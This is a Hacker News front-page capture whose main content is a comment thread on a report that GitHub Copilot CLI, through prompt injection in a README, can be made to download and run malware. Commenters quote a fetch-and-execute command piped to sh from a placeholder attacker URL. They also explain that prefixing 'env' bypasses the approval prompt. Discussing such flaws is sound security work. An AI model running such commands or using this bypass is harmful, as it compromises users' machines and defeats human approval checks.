frontpage.
newsnewestaskshowjobs

Made with ♥ by @iamnishanth

Open Source @Github

fp.

Open in hackernews

GitHub Copilot CLI downloads and executes malware

https://www.promptarmor.com/resources/github-copilot-cli-downloads-and-executes-malware
43•sarelta•11h ago

Comments

hackerBanana•11h ago
does everyone really need their own coding agent CLI? i feel like companies are skipping security to push out these tools
jbloggs777•11m ago
There are many security and business risks in developing and releasing software (eg. supply chain attacks, misconfigurations & security-relevant bugs), and many ways to manage them. For companies, this is just another risk to be managed.
0xbadcafebee•1h ago

  Here is a malicious command that bypasses the shell command detection mechanisms: 
    $ env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh
lol
binsquare•1h ago
This isn't a novel technical vulnerability write up.

The author had copilot read a "prompt injection" inside a readme while copilot is enabled to execute code or run bash commands (which user had to explicitly agree to).

I highly suspect this account is astro-turfing for the site too... look at their sidebar:

``` Claude Cowork Exfiltrates Files

HN #1

Superhuman AI Exfiltrates Emails

HN #12

IBM AI ('Bob') Downloads and Executes Malware

HN #1

Notion AI: Data Exfiltration

HN #4

HuggingFace Chat Exfiltrates Data

Screen takeover attack in vLex (legal AI acquired for $1B)

Google Antigravity Exfiltrates Data

HN #1

CellShock: Claude AI is Excel-lent at Stealing Data

Hijacking Claude Code via Injected Marketplace Plugins

Data Exfiltration from Slack AI via Indirect Prompt Injection

HN #1

Data Exfiltration from Writer.com via Indirect Prompt Injection

HN #5 ```

crummy•1h ago
Isn’t the news that “curl whatever” will prompt the user for confirmation but “env curl whatever” won’t?
binsquare•46m ago
It's a valid observation that we can bypass the coding AI's user prompting gate with the right prompt.

But is it a security issue on copilot that the user explicitly giving AI permission and instructed it to curl a url?

Regardless of the coding agent, I suspect eventually all of the coding agents will behave the same with enough prompting regardless if it's a curl command to a malicious or legitimate site.

roywiggins•28m ago
The user didn't need to give it curl permission, that's the whole issue:

> Copilot also has an external URL access check that requires user approval when commands like curl, wget, or Copilot’s built-in web-fetch tool request access to external domains [1].

> This article demonstrates how attackers can craft malicious commands that go entirely undetected by the validator - executing immediately on the victim’s computer with no human-in-the-loop approval whatsoever.

roywiggins•44m ago
It's probably bad that the system 1) usually prompts you to take shell actions like `curl`, but 2) by default whitelists `env` and `find` that can invoke whatever it wants without approval.

If 2) is fine then why bother with 1)? In yolo mode such an injection would be "working as designed", but it's not in yolo mode. It shouldn't be able to just do `env sh` and run whatever it wants without approval.

altairprime•30m ago
Please email the mods rather than posting accusations of astroturfing. You may well be right, but they specifically direct us to say that to them rather than in comments. The footer contact email works well for this.
fulafel•19m ago
It does circumvent a flimsy control:

"The env command is part of a hard-coded read-only command list stored in the source code. This means that when Copilot requests to run it, the command is automatically approved for execution without user approval."

politelemon•13m ago
Reading the other posts on their site, I don't agree. It's just like any other security research shop. I've found most of their posts quite thorough and the controls being circumvented well explained.
jasonhansel•15m ago
> The env command is part of a hard-coded read-only command list stored in the source code. This means that when Copilot requests to run it, the command is automatically approved for execution without user approval.

Wait, what? Sure, you can use "env" like "printenv", to display the environment, but surely its most common use is to run other commands, making its inclusion on this list an odd choice, to say the least.

We Will Not Be Divided

https://notdivided.org
1047•BloondAndDoom•5h ago•395 comments

Statement on the comments from Secretary of War Pete Hegseth

https://www.anthropic.com/news/statement-comments-secretary-war
766•surprisetalk•4h ago•261 comments

Don't use passkeys for encrypting user data

https://blog.timcappalli.me/p/passkeys-prf-warning/
82•zdw•2h ago•35 comments

Croatia declared free of landmines after 31 years

https://glashrvatske.hrt.hr/en/domestic/croatia-declared-free-of-landmines-after-31-years-12593533
83•toomuchtodo•3h ago•7 comments

OpenAI agrees with Dept. of War to deploy models in their classified network

https://twitter.com/sama/status/2027578652477821175
312•eoskx•3h ago•187 comments

Show HN: I ported Manim to TypeScript (run 3b1B math animations in the browser)

https://github.com/maloyan/manim-web
46•maloyan•2d ago•5 comments

Smallest transformer that can add two 10-digit numbers

https://github.com/anadim/AdderBoard
120•ks2048•1d ago•41 comments

OpenAI raises $110B on $730B pre-money valuation

https://techcrunch.com/2026/02/27/openai-raises-110b-in-one-of-the-largest-private-funding-rounds...
448•zlatkov•15h ago•492 comments

A new California law says all operating systems need to have age verification

https://www.pcgamer.com/software/operating-systems/a-new-california-law-says-all-operating-system...
502•WalterSobchak•15h ago•478 comments

President Trump bans Anthropic from use in government systems

https://www.npr.org/2026/02/27/nx-s1-5729118/trump-anthropic-pentagon-openai-ai-weapons-ban
220•pkress2•8h ago•182 comments

Cash Issuing Terminals

https://computer.rip/2026-02-27-ibm-atm.html
5•zdw•39m ago•0 comments

Qt45: A small polymerase ribozyme that can synthesize itself

https://www.science.org/doi/10.1126/science.adt2760
66•ppnpm•6h ago•14 comments

OpenAI reaches deal to deploy AI models on U.S. DoW classified network

https://www.reuters.com/business/openai-reaches-deal-deploy-ai-models-us-department-war-classifie...
82•erhuve•2h ago•20 comments

A better streams API is possible for JavaScript

https://blog.cloudflare.com/a-better-web-streams-api/
393•nnx•15h ago•135 comments

NASA announces overhaul of Artemis program amid safety concerns, delays

https://www.cbsnews.com/news/nasa-artemis-moon-program-overhaul/
237•voxadam•13h ago•259 comments

A Chinese official’s use of ChatGPT revealed an intimidation operation

https://www.cnn.com/2026/02/25/politics/chatgpt-china-intimidation-operation
184•cwwc•14h ago•116 comments

Eschewing Zshell for Emacs Shell (2014)

https://www.howardism.org/Technical/Emacs/eshell-fun.html
21•pvdebbe•3d ago•5 comments

Get free Claude max 20x for open-source maintainers

https://claude.com/contact-sales/claude-for-oss
517•zhisme•20h ago•211 comments

Time-Travel Debugging: Replaying Production Bugs Locally

https://lackofimagination.org/2026/02/time-travel-debugging-replaying-production-bugs-locally/
6•tie-in•2d ago•0 comments

Semantic Syntax Highlighting for Lisp in Emacs

https://github.com/calsys456/lisp-semantic-hl.el
3•oumua_don17•3d ago•0 comments

Open source calculator firmware DB48X forbids CA/CO use due to age verification

https://github.com/c3d/db48x/commit/7819972b641ac808d46c54d3f5d1df70d706d286
160•iamnothere•14h ago•79 comments

GitHub Copilot CLI downloads and executes malware

https://www.promptarmor.com/resources/github-copilot-cli-downloads-and-executes-malware
43•sarelta•11h ago•13 comments

I am directing the Department of War to designate Anthropic a supply-chain risk

https://twitter.com/secwar/status/2027507717469049070
1223•jacobedawson•7h ago•989 comments

Show HN: Claude-File-Recovery, recover files from your ~/.claude sessions

https://github.com/hjtenklooster/claude-file-recovery
67•rikk3rt•13h ago•24 comments

Bootc and OSTree: Modernizing Linux System Deployment

https://a-cup-of.coffee/blog/ostree-bootc/
9•mrtedbear•3h ago•1 comments

Inventing the Lisa user interface – Interactions

https://dl.acm.org/doi/10.1145/242388.242405
26•rbanffy•2d ago•2 comments

Implementing a Z80 / ZX Spectrum emulator with Claude Code

https://antirez.com/news/160
139•antirez•2d ago•67 comments

Let's discuss sandbox isolation

https://www.shayon.dev/post/2026/52/lets-discuss-sandbox-isolation/
122•shayonj•11h ago•39 comments

Kyber (YC W23) Is Hiring an Enterprise Account Executive

https://www.ycombinator.com/companies/kyber/jobs/59yPaCs-enterprise-account-executive-ae
1•asontha•11h ago

Allocating on the Stack

https://go.dev/blog/allocation-optimizations
141•spacey•13h ago•50 comments